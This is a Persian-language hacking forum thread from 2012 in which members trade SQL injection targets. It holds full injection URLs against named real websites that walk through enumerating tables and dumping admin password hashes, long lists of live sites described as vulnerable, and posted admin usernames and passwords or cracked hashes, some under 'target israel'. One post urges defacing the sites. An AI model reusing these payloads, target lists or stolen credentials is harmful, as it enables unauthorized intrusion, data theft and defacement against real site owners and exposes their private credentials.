اطلاعیه

**Ali_Sedaghat** · 11-17-2012, 01:32 PM

RE: تارگت های SQLi

سلام دوستان
من هم يه تارگت گذاشتم. البته مراحل كار را به ترتيب براتون نوشتم. هر چند كه مي دونم تمام دوستان توي اين كار خبره اند.
تارگت:
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=3393[/php]
1- پيدا كردن تعداد ستون ها
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=3393'+order+by+18--+[/php]
2-پيدا كردن ستون هاي آسيب پذير
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--+[/php]
3- پيدا كردن نسخه ي ديتابيس
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18--+[/php]
4- پيدا كردن نام جداول
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,group_concat(table_name),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+informat ion_schema.tables+where+table_schema=database()--+[/php]
5- پيدا كردن ستون هاي موجود در جدول مورد نظر
[php]Table_Name = administrators
http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,group_concat(column_name),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+informa tion_schema.columns+where+table_name=0x61646D696E6 973747261746F7273--+
[/php]
6- پيدا كردن محتويات ستون هاي مورد نظر
[php]http://www.cobee.com.sg/book_detail.php?ssId=f88b7ecf72077a9b8706b72177aec a50&&bookId=-3393'+UNION+SELECT+1,group_concat(user_name,0x3a,u ser_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18+from+administrators--+
[/php]
7- ديكد كردن رمز هش شده
[php]User: admin
Password: 42d8aa7cde9c78c4757862d84620c335 = q1w2e3r4t5[/php]
8- پيدا كردن صفحه ي لاگين مديريت
[php]http://www.cobee.com.sg/administrator/index.html[/php]
با تقديم احترام
صداقت
[hr]
[php]http://www.giftsparadise.ca/products.php?ssid=-999%27+/*!50000UNION*/+SELECT+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21--+--
http://www.senscot.net/view_prof.php?viewid=-2906+union+select+1,@@version--
http://www.fiapo.org/view_news.php?viewid=-11818+union+select+@@version,2,3--
http://www.westlibertyindex.com/article.php?viewID=-4890+/*!50000UNION*/+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12--
[/php]
توضيح درباره ي لينك آخر:
اگه دقت كرده باشيد در وسط صفحه چيزي نمايش داده نميشه ولي وقتي به نوار عنوان نگاه مي كنيد مي بينيد كه نسخه ي ديتابيس در اون جا به نمايش گذاشته شده.
با تقديم احترام
صداقت

**Ali_Sedaghat** · 11-17-2012, 06:56 PM

RE: تارگت های SQLi

دوباره تارگت هاي جديد
[php]http://www.theatreguildsimsbury.org/show.php?ShId=-23+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11--
http://eurosportimports.com/vechicles.php?carID=-101+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11--
http://www.bayareachurches.com/ministrymoredetail.php?minid=-26+UNION+SELECT+1,2,3,4,5,6,version(),8--
http://www.argyllagriculturalforum.com/viewminutes.php?minid=-5%27+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14--+[/php]

**v!per** · 11-19-2012, 03:02 PM

RE: تارگت های SQLi

target israel
http://www.humor.co.il/
user:itai
pass:123
user:alex
pass:123
user:rafi
pass:12345
[hr]
target israel
http://doorcenter.co.il/
user:eyal
pass:halili11
user:shachar
pass:sprite
[hr]
target israel
http://www.art-time.co.il
login:zione99
pass:zione99*!@#$

**v!per** · 11-19-2012, 04:39 PM

RE: تارگت های SQLi

سايت http://www.bcspeakers.com/
user:becspeak2803
pass:BaF5643De

**Ali_Sedaghat** · 11-20-2012, 06:32 AM

RE: تارگت های SQLi

سلام دوستان
شب تون به خير
براي تمرين تعدادي تارگت Sqli قرار دادم. اميدوارم مورد پسندتون واقع بشه.
[PHP]http://www.cloudynights.com/item.php?item_id=-2755+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,version( ),13,14,15,16,17,18,19,20,21,22,23--
https://afterdark.co/ticket.php?ticket_id=-3499+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version(),1 2,13,14,15,16,17,18,19,20--
http://trace.eu.org/rss/trace_event.php?NUM_ID=-105+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10,11,1 2--
http://www.revue-interrogations.org/index.php?num_ID=-8+UNION+SELECT+1,2,version(),4,5,6,7,8--
http://bretagnevivante.asso.free.fr/BVcatalogue.php?NUM_ID=-302+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11--
http://www.amigosoperamadrid.es/noticias_actualidad_completa.php?num_id=-591+/*!UNION*/+SELECT+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--

http://www.switch-foot.com/view_item.php?item_id=-17+UNION+SELECT+1,2,version()--[/PHP]
براي ادامه دادن مراحل در لينك آخر بايد خوب دقت كنيد. وقتي كه شما لينك آخر را در نوار آدرس مرورگر وارد مي كنيد بعد از لود شدن سايت نسخه ي ديتابيس در هيچ قسمت سايت نوشته نميشه اما اگه روي عكسي كه در بالاي متن Add Item to Cart است قرار بگيريد مي بينيد كه نام فايل عكس همون نسخه ي ديتابيس هست.
با تقديم احترام
صداقت

**rahrast** · 11-21-2012, 01:44 AM

RE: تارگت های SQLi

اینم از ما ... !!!
http://www.woodwind-group.com.au/eventdetails.php?eventid=47
http://216.128.3.155/careers/detail.asp?id=6
http://www.amigosoperamadrid.es/noticias_actualidad_completa.php?num_id=591
http://www.nashvillejazz.org/EventDetails.php?eventID=160
http://www.ireth.net/prodotti.php?id=41
http://www.fiab.it/en/prodotti.php?id=53
http://www.digitechtiming.com/prodotti.php?id_category=1&id_lang=1
http://www.caldaie-climatizzatori.com/prodotti.php?id=32
http://www.granitetransformations.it/prodotti.php?id=66
http://www.soredi.it/prodotti.php?id=59&lingua=2&tipo=menu&idcategoria= 12
http://www.cemoto.it/prodotti.php?act=1&id=11
http://www.prologicitalia.it/prodotti.php?id=Tournamentrods
http://www.clinians.it/prodotti.php?id=30&language=en

**rahrast** · 11-22-2012, 11:25 PM

RE: تارگت های SQLi

اینم چند تا دیگه ...!!!
http://www.organichairpro.com/os_view_full.php?id=40'
http://ciclops.org/view.php?id='2230
http://www.metakey.com.my/os_view_full.php?id=556
http://www.trailblazerar.com/calendar/detail.php?id=655
http://masternegotiator.com/viewfaqs.php?cat=2
http://phpauctions.info/demo/viewfaqs.php?cat=3
http://www.aoifeonline.com/news.php?id=49
http://www.moslerauto.com/news.php?id=64
http://www.raahauges.com/view-news.php?id=8
http://www.pinnaclecommunities.com/pages/news_view.php?newsid=13
http://www.wisconsinreport.com/statenews/detail.php?id=776
http://www.inawordlanguages.com/news.php?id=2
http://www.nybmwcca.org/news.php?id=9
http://www.areadanzalivorno.it/news.php?id=73
http://www.chieftainglobal.com/commodities.php?id=324

**blackhacking21** · 11-23-2012, 05:01 PM

RE: تارگت های SQLi

یه سوال راجع به sql i
خوب دیتابیس ها و جداول یک تارگت رو پیدا کردم ، یوزر پسورد ادمین توی کدوم جدول هستش ؟

**rahrast** · 11-24-2012, 10:39 PM

RE: تارگت های SQLi

اینم چند تا دیگه !
http://www.bible-history.com/subcat.php?id=22
http://www.ichatime.com/product.php?mid=8
http://siam-indo.com/general.php?id=8
http://www.musichallaudio.com/detail.php?p=68
http://www.hkyongnuo.com/e-detail.php?ID=288
http://www.thaiticketmajor.com/concert/concert-detail.php?sid=1587
http://www.payolibre.com/articulos/imprimir.php?id=1060
http://www.nearural.com/imprimir.php?id=16502
http://www.novatrento.com.br/imprimir.php?id=71

**Ali_Sedaghat** · 11-25-2012, 02:19 PM

RE: تارگت های SQLi

نوشته اصلی توسط blackhacking21

یه سوال راجع به sql i
خوب دیتابیس ها و جداول یک تارگت رو پیدا کردم ، یوزر پسورد ادمین توی کدوم جدول هستش ؟

با توجه به نوع cms متفاوته.
گاهي ممكنه جدولي به نام admin وجود داشته باشه گاهي اوقات ممكنه اطلاعات ادمين در جدول user ذخيره شده باشه و گاهي اوقات در جدولي به نام administrator و غيره.
بايد خودت جداول را بررسي كني و ببيني در كدوم جدول اطلاعات ادمين ذخيره ميشه
با تقديم احترام
صداقت

**Mr.XpR** · 11-25-2012, 06:17 PM

RE: تارگت های SQLi

وبسایت یه خواننده مشهور هست فکر کنم !

[align=LEFT]

کد:

   
 http://www.ewastrusinska.com/page.php?id=-1+union+select+1,2,3,group_concat%28column_name%29,5,6+from+information_schema.columns+where+table_name=CHAR%28101,%20115,%2095,%2099,%20109,%20115,%2095,%20117,%20115,%20101,%20114,%20115%29

[align=LEFT]

کد:

   
http://www.ewastrusinska.com/page.php?id=-1+union+select+1,2,3,group_concat%28nazwa,0x3a,haslo%29,5,6+from+es_cms_users

[/align]
[/align]

**rahrast** · 11-25-2012, 06:24 PM

RE: تارگت های SQLi

اینم چند تا تارگت دیگه !
http://www.acmaya.ro/detalii.php?id=36
www.pixheaven.net/galerie_us.php?id=22
http://www.bostonhigashi.org/about.php?id=1
http://www.ewastrusinska.com/page.php?id=1%27
http://www.morini.ch/product_det.php?id=1
http://tmvff.org/mvff_films_adults.php?id=1
http://apiexchange.com/index_main.php?id=1
http://www.mascar.it/product.php?id=1
http://www.worldspaceweek.org/eventdetails.php?eventid=1767
http://www.galaxynet.com/default.php?id=97
http://www.ath-elite.com.au/trainers.php?id=25
http://www.innoworks.org/newinno/bios2.php?staff_id=1
[hr]
این هارو هم اینجکت کردم ادمین پیج رو پیدا نکردم !
اگه پیدا کردی دیفیس کن و اگر نه که هیچی ...!!!
http://www.rothamsted.ac.uk/
user:library
passwd:428d50a52f2017a7

http://inovalley.co.uk/
user:inoDBAdmin
passwd:509334ac828b28891bfc2d2f1b89fbaa

**blackhacking21** · 11-26-2012, 06:12 PM

RE: تارگت های SQLi

http://www.acmaya.ro
user ==admin
password ==root81
ادمین پیجشو پیدا نکردم
[hr]
target : http://www.ewastrusinska.com
user = admin
password = zimnawoda

**blackhacking21** · 11-26-2012, 08:09 PM

RE: تارگت های SQLi

بعضی هش ها چرا کرک نمیشن ؟ این یک مشکل اساسیه اگه میشه پاسخ بدین لطفا
مثل این
تارگت =http://www.cobee.com.sg
نام کاربری = admin
پسورد = 68f450685e5e0626d98984d48d23a08a

**blackhacking21** · 11-26-2012, 10:18 PM

RE: تارگت های SQLi

http://www.averyindia.co.in/products.php?id=2+order+by+6--